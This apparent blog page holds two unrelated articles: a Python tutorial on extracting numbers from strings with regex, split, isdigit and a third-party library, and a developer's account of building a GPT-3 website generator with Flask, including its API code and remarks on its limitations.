👉 GitHub: https://github.com/shandralor/PeerBrain


How To Extract Numbers From A String In Python?


The easiest way to extract numbers from a Python string s is to use the expression re.findall(r'\d+', s). For example, re.findall(r'\d+', 'hi 100 alice 18 old 42') yields the list of strings ['100', '18', '42'] that you can then convert to numbers using int() or float().

There are some tricks and alternatives, so keep reading to learn about them. 👇

In particular, you'll learn about several methods to extract numbers from a given string in Python.

Problem Formulation

Extracting digits or numbers from a given string might come up in your coding journey quite often. For instance, you may want to extract certain numerical figures from a CSV file, or you need to separate complex digits and figures from given patterns.

Having said that, let us dive into our mission-critical question:

Problem: Given a string. How to extract numbers from the string in Python?

Example: Consider that you have been given a string and you want to extract all the numbers from the string as given in the following example:

Given is the following string:

s = 'Extract 100, 1000 and 10000 from this string'

This is your desired output:

[100, 1000, 10000]
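As a quick preview of Method 1 below, a regex one-liner already produces exactly this output:

```python
import re

s = 'Extract 100, 1000 and 10000 from this string'
print([int(n) for n in re.findall(r'\d+', s)])
# [100, 1000, 10000]
```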

Let us discuss the methods that we can use to extract the numbers from the given string:

Method 1: Using Regex Module

The most efficient approach to solving our problem is to leverage the power of the re module. You can easily use Regular Expressions (RegEx) to check or verify if a given string contains a specified pattern (be it a digit or a special character, or any other pattern).

Thus to solve our problem, we must import the re module, which is already included in Python's standard library, and then extract the numbers from the given string with the help of the findall() function.

Learn More: re.findall() is an easy-to-use regex function that returns a list containing all matches. To learn more about re.findall() check out our blog tutorial here.

Let us have a look at the following code to understand how we can use the regex module to solve our problem:

import re

sentence = 'Extract 100 , 100.45 and 10000 from this string'
s = [float(s) for s in re.findall(r'-?\d+\.?\d*', sentence)]
print(s)

Output

[100.0, 100.45, 10000.0]

This is a Python code that uses the re module, which provides support for regular expressions in Python, to extract numerical values from a string.

Code explanation: 👇

The line s = [float(s) for s in re.findall(r'-?\d+\.?\d*', sentence)] uses the re.findall() function from the re module to search the sentence string for numerical values.

Specifically, it looks for strings of characters that match the regular expression pattern r'-?\d+\.?\d*'. This pattern matches an optional minus sign, followed by one or more digits, followed by an optional decimal point, followed by zero or more digits.

The re.findall() function returns a list of all the matching strings.

The list comprehension [float(s) for s in re.findall(r'-?\d+\.?\d*', sentence)] takes the list of matching strings returned by findall and converts each string to a floating-point number using the float() function. This resulting list of floating-point numbers is then assigned to the variable s.
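Thanks to the leading -?, the same pattern also captures negative numbers, for example:

```python
import re

sentence = 'The value changed by -3.5 and then by 10'
print([float(x) for x in re.findall(r'-?\d+\.?\d*', sentence)])
# [-3.5, 10.0]
```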

👉 Recommended: Python List Comprehension

Method 2: Split and Append The Numbers To A List using split() and append()

Another workaround for our problem is to split the given string using the split() function, extract the numbers using the built-in float() method, and then append the extracted numbers to a list.

Note:

  • split() is a built-in Python method that splits a string into a list of substrings.
  • append() is a built-in Python list method that adds an item to the end of a list.

Now that we have the necessary tools to solve our problem based on the above concept let us dive into the code to see how it works:

sentence = 'Extract 100 , 100.45 and 10000 from this string'

s = []
for t in sentence.split():
    try:
        s.append(float(t))
    except ValueError:
        pass
print(s)

Output

[100.0, 100.45, 10000.0]

Method 3: Using isdigit() Function In A List Comprehension

Another approach to solving our problem is to use the isdigit() inbuilt function to extract the digits from the string and then store them in a list using a list comprehension.

The isdigit() function is used to check if a given string contains digits. Thus if it finds a character that is a digit, then it returns True. Otherwise, it returns False.

Let us have a look at the code given below to see how the above concept works:

sentence = 'Extract 100 , 100.45 and 10000 from this string'
s = [int(s) for s in sentence.split() if s.isdigit()]
print(s)

Output

[100, 10000]

☢ Alert! This technique is best suited to extract only positive integers. It won’t work for negative integers, floats, or hexadecimal numbers.
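You can see these limitations directly by calling isdigit() on a few sample strings:

```python
# isdigit() is only True for strings made up entirely of digit characters.
print('100'.isdigit())     # True
print('-100'.isdigit())    # False: the minus sign is not a digit
print('100.45'.isdigit())  # False: the decimal point is not a digit
```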

Method 4: Using Numbers from String Library

This is a quick hack if you want to avoid spending time typing explicit code to extract numbers from a string.

You can import a library known as nums_from_string and then use it to extract numbers from a given string. It contains several regex rules with comprehensive coverage and can be a very useful tool for NLP researchers.

Since the nums_from_string library is not a part of the standard Python library, you have to install it before use. Use the following command to install this useful library:

pip install nums_from_string

The following program demonstrates the usage of nums_from_string:

import nums_from_string

sentence = 'Extract 100 , 100.45 and 10000 from this string'
print(nums_from_string.get_nums(sentence))

Output

[100.0, 100.45, 10000.0]

Conclusion

Thus from the above discussions, we found that there are numerous ways of extracting a number from a given string in Python.

My personal favorite, though, would certainly be the regex module re.

You might argue that other methods like the isdigit() and split() approaches provide simpler, more readable, and faster code. However, as mentioned earlier, the split() approach (Method 2) does not work for floats that have no space between them and other characters, like '25.50k', and the isdigit() approach (Method 3) cannot handle negative numbers or floats at all.

Furthermore, speed is a mostly irrelevant metric when it comes to log parsing. Now you see why regex is my personal favorite in this list of solutions.

If you are not very fond of the re library, especially because you find it difficult to get a strong grip on this concept (just like me in the beginning), here's THE TUTORIAL for you to become a regex master. 🤯🤯

I hope you found this article useful and added some value to your coding journey. Please stay tuned for more interesting stuff in the future.


I Created a ChatGPT-Powered Website Creator with ChatGPT – Here’s What I Learned


I wanted to learn how to use GPT, the new large language model created by OpenAI. I also wanted to know if it could be used in a practical web application.

Here’s my video: 🤯

YouTube Video

To learn it, I created a website that uses GPT in two ways: I used it to write the web application's code, and the application itself uses GPT-3 to generate other simple web pages or one-page web applications.

A Few Words on ChatGPT

GPT stands for Generative Pre-trained Transformer.

Its background is explained in depth in its wiki article, and why it works is covered in a great article by Stephen Wolfram. GPT is a high-powered autocomplete that creates paragraphs and words based on their statistical association. It adds randomness to this selection, so it does not always return the same result given the same prompt.

 I witnessed how it can enable great applications in multiple ways. 👇

  • ChatGPT Usage 1: Its text autocompletion can be used to produce well-written code.
  • ChatGPT Usage 2: It can also be used in the application to enable or enhance its functionality. 
  • ChatGPT Usage 3: The coder can also use it to expedite learning and create new code.

In creating the website, I found the latter to be the most useful.

This article guides you through how I used and created a website that can generate a website from a text prompt. OpenAI's GPT Davinci model powers the site. I used OpenAI's ChatGPT to create much of its code.

I also used the GPT-3-based Ghostwriter code assistant in the Replit IDE (integrated development environment) for auto-completion. I also examine how I used prompt engineering, Flask, and JavaScript to create its functionality.

The GPT-3 Website Prototyper Site

Here’s an example of what the site looks like:

Here’s an example of a pong game created with it just from entering the above prompt text:

How the Application Works

Let’s first see what the site does before we look into its code.

Here’s the site https://web-prototyper.kevron.repl.co/. Go to the site and enter a prompt.  

Here are some example prompts:

  • “Create an HTML pong game with javascript and an AI”
  • “Create an HTML page with street address, zip code, first name, last name, and a date picker for the birthdate.”

Here’s a site that gives you information on prompt engineering from OpenAI. If you want to create a website, you’ll have some keywords like “JavaScript” and “HTML”. In addition, you can add CSS and colors to your site. 

Then click the Create button, which fetches the output from the GPT Davinci API. Enter a name. Then save.

You can click on the link to go to the site. You can also click on the code link to view the generated code. You should remember that the code it generates has some randomness to it, and it won't always return the same result.

How I Created the GPT-3 Website Prototyper Site

I wrote some of this website’s code using Chat-GPT and then manually put the pieces together.

This is a gap in the AIs, and where programmers come in: the AIs can't see the big picture or put together pieces of code from different sites like

  • Stack Overflow,
  • Google,
  • Finxter, and
  • Chat GPT.

ChatGPT, on the other hand, can only draw on code it has already been trained on. Throughout the creation of this site, I used all of these sources; I could not just use ChatGPT.

One of the current gaps humans can fill that Chat generators can’t, even though they are impressive, is tying large pieces and concepts together accurately. So I had to manually tie together the front end, backend, and saving functionality.

Here’s the prompt used to create the Flask backend.

This generated back-end Flask Python code and front-end JavaScript code; the JavaScript code called the Flask backend.

I modified the code to work with my site, but the basic structure of the code is from what was generated by OpenAI. I was not familiar with Flask, though I'm a professional web developer. ChatGPT, the Finxter tutorial, and my experience helped me get up to speed with Flask in minutes.

The code for the application can be found on Replit and Github. I’ll post links to the Replit because I believe it gives you the best ability to run and fork the code. 

The communication of the API is the Python code here (Replit):

def gpt3_request():
    data = request.get_json()
    prompt = data['prompt']
    completions = openai.Completion.create(
        engine="text-davinci-002",
        prompt=prompt,
        max_tokens=4000,
        n=1,
        stop=None,
        temperature=0.5,
    )
    message = completions.choices[0].text
    print(message)
    return jsonify({'message': message})

It’s called by the JavaScript code here, which parses the HTML. You can see the code below. 

It does this to organize the code into CSS, HTML, and JavaScript. It’ll later be injected back into the DOM of a new page. I did this step because the JavaScript and CSS were not always well-formed, so I wanted to separate them out.

I used ChatGPT and Stack Overflow. In particular, I used Stack Overflow to determine which JavaScript technique I should use to save the data in the database.

I like Stack Overflow because it has a human voting mechanism, feedback, and different, sometimes opposing, perspectives. This is something ChatGPT misses: it is only one source.

Here's the prompt I used on ChatGPT to show me the JavaScript client-side database code.

I knew I had to save the data on the client. Here's some of the code that saves to the client:

You can see the full code here: https://replit.com/@kevron/Web-Prototyper#static/post.js

About 75% of it is the same code I got from ChatGPT.

The technologies used are Replit for the IDE, OpenAI Davinci, Python and Flask for the backend, HTML and JavaScript for the frontend, Git for source control, and ChatGPT.

Understanding the Security, Safety Concerns, and Limitations

This is a powerful technology, and there are both security and safety concerns, which I learned about from using GPT-3 and reading articles about it.

The security concern in this app is that I can now generate tons of HTML pages if I want to. What if some of the information on these pages is unsafe or inaccurate? The potential inaccuracy of the data is mentioned on many sites. This technology needs to be used responsibly.

Since this is a powerful new technology, many other safety concerns may arise. I think they'll vary depending on an organization's specific use of GPT.

These models also lack the ability to generalize and see the big picture.

Also, the data is stored in the browser's database. Keeping the generated HTML on the client is fine for a demo or an internal company tool, but saving it in a shared server-side database could be dangerous and open up cross-site scripting concerns.

For example, it could be saved in GitHub or saved in someone else’s database.

My Conclusions

This technology is super exciting and will empower many people to create things from just an idea.

Bill Gates and other large investors have said this technology is transformative. Companies such as Google and Microsoft are investing millions of dollars in it. 

Despite the safety concerns of GPT and some of its limitations, I’m very excited about working with this technology and other assistive AI technology in the future.

It helped me immensely in writing this code.

I’m also optimistic that some of its criticisms of accuracy are being worked on and addressed.

I learned through writing this article how powerful and helpful GPT can be as an assistive tool. I also learned firsthand that while GPT is powerful, it does not seem like it will replace a human programmer. It cannot generalize, see the big picture, and fact-check like a human does from multiple sources.

So I hope that in following this article, you’ve developed knowledge about GPT and learned how to use it as a code generation tool too.